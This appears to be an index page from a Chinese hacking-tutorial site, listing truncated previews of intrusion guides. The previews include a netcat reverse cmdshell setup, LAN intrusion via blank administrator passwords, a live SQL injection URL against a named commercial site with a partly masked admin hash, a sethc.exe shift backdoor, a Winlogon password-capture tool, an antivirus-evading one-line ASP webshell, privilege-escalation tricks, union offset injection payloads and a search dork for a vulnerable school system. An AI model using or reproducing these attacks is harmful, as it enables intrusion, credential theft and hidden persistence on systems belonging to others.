Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# NC反弹Cmdshell
  • 日期:2011-07-22 点击:205前提: 1.能用WebShell运行cmd命令。 方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。 2.上传nc。可以跟cmd.exe上传到同一目录。 步骤: 现在本地监听一个端口。 nc -vv -l -p 8080 最好是80或8080这样的端口,被防火
  • Linux安全# 入侵局域网
  • 日期:2011-07-22 点击:217首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,D
  • Linux安全# tom注入点
  • 日期:2011-07-22 点击:197title:TOM.com注入漏洞 漏洞:php sql injection 漏洞文件:content.php http://webi.tom.com/content.php?id=6 and 1=2 union select 1,user(),3,4,version(),6,7,8,9,10,11,12,13,14/* 账号:edit密码: c794726a3d32ecd542b8c06f584f90XX 后台: http://w
  • Linux安全# sethc.exe新的镜像劫持技术和安全防御!(shift后门)
  • 日期:2011-07-22 点击:205很多 朋友 发我个shift 后门 ,带镜像劫持的,可以按5下shift,然后输入 密码 . 5下shift 不关闭 然后鼠标右键点出来的那个框框右下角... 前提是先 运行 个p处理或reg,这个方法比较牛X.. 注册 表如下 Win dows Registry Editor Version 5.00 [HKEY_LOCAL_MACHIN
  • Linux安全# WinlogonHack
  • 日期:2011-07-22 点击:195WinlogonHack windows 2000 截取管理密码的东东! 包括文件:Hookmsgina.dll On.reg install.bat ReadLog.bat Uninstall.bat Un.reg 截取后的文件xxx.dat 例如:bootstat.dat 一 执行install.bat 安装。 不用重启, 当有3389登上时,自动加载DLL,并且记录登录
  • Linux安全# 手工差异备份
  • 日期:2011-07-22 点击:195字符型 1.恢复当前库 ;alter database 当前库 set RECOVERY FULL-- 2.创建表cmd ;create table cmd (a image)-- 3.备份当前库到D:\cmd1 ;backup log 当前库 to disk = 'D:\cmd1' with init-- 4.插入一句话代码到创建的表cmd ;insert into cmd (a) values ('%
  • Linux安全# 内网渗透笔记
  • 日期:2011-07-22 点击:206在我们的 渗透 过程中,很多大型网络的外部网站或是 服务器 不一定有用,当然外网也可以作为我们的一个突破口,毕竟没有经过尝试,我们也不知道里面的结构,至少在外部上我们可以获取一定的信息也说不定,但是对于内网,外网绝对不是我们的主要路径。很多时
  • Linux安全# 迅雷提权 方法
  • 日期:2011-07-22 点击:201迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码, 把我们所下载东西添加到列表当中。 所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm 一处是C:\Program Files\Thunder Network\
  • Linux安全# 一句话木马的免杀处理
  • 日期:2011-07-22 点击:208在进一步入侵服务器时,上传的文件会被服务器过滤掉,我们上传的WEBSHLL就无法运行了! 以蓝屏最小ASP木马为例子!进行如下修改。 原来代码是%execute request(cmd)% 把标签修改替换下来 为 scriptlanguage=VBScript runat=serverexecute request(cmd)/Script
  • Linux安全# access 偏移注入
  • 日期:2011-07-22 点击:194我举动力文章的例子,他的是28个字段,加入admin表5个字段,那么 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from
  • Linux安全# 再探偏移注射
  • 日期:2011-07-22 点击:198于Union偏移注射这个东西,最早貌似是lake2大 黑客 提出来的,以前一直当他是鸡肋,没去关注过,直到昨天遇到一个mysql 4.1的点。 表,列都猜出来了,就差数据。因为他的参数是按,分割的,所以在注射的时候必须避开逗号,这样一来普通的union就用不成了,想
  • Linux安全# dk系统漏洞
  • 日期:2011-07-22 点击:195今天看博客里的评论多出来个燕落留声的什么加个网站链接, 因为评论的版块被我改动过, 所以删除还是比较麻烦的。。 我就去他的站看了下。 加了个/admin,知道 源码信息 ,百度下 有漏洞fckeditor的 (子仪最先发布的但是根据他步骤貌似不对,建立不了文件夹,估
  • Linux安全# 导出系统注册表抓Hash
  • 日期:2011-07-22 点击:202作者:TheLostMind 看到一篇文章,提到导出注册表永CAIN来破密码,这对很多抓hash的工具被杀了,自己又不会做免杀的大牛来说,是个福音,其实这个很早以前就有了,貌似是老外提出了的,只是没有引起注意。 作者说这个方法不是通杀的: Windows 2000 SP4 (adm
  • Linux安全# IIS asp隐藏小马
  • 日期:2011-07-22 点击:200!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01 Transitional//EN http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd HTMLHEADTITLE该页要求客户长相达到正常水平才能显示/TITLE META http-equiv=Content-Type content=text/html; charset=GB2312 ST
  • Linux安全# winwebmail 提权
  • 日期:2011-07-22 点击:208winwebmail 提权,权限 everyone可写 服务器替换服务提权,注册表读取路径。。 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinWebMail Server\imagepath
  • Linux安全# 激情检测黄色网站
  • 日期:2011-07-22 点击:213xiaowei'blog www.xiaoweio.cn 激情检测某黄色网站! PS:添加自定义页面就拿下了 整站权限设置比较变态。 但是还是可以为所欲为的。。呵呵 下面截了点图给大家赏析!
  • Linux安全# 新Or 1=1的脚本注入技术详解
  • 日期:2011-07-22 点击:205一位朋友问,如果一个站过滤了and和的话,改怎么注入啊?当时我随口说了句or注入,后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or
  • Linux安全# 比较有效的提权方法 部分转载并持续更新
  • 日期:2011-07-22 点击:199No.10 Vnc Vnc不少老外都在用,国内用的比较少,但是几率很大。 ============== VNC 漏洞 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端
  • Linux安全# 心海学校心理管理系统Xday
  • 日期:2011-07-22 点击:199心海学校心理管理系统 漏洞类型:上传漏洞(IIS解析漏洞) 关键词 :1.inurl:zytest/main.asp?id= 2.心理 inurl:article/print.asp?id= 漏洞描述:由于IIS6.0存在解析漏洞,所以本漏洞利用方式工作于windows 系统平台IIS6.0下的 漏洞利用:inc/upload.asp?fl
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史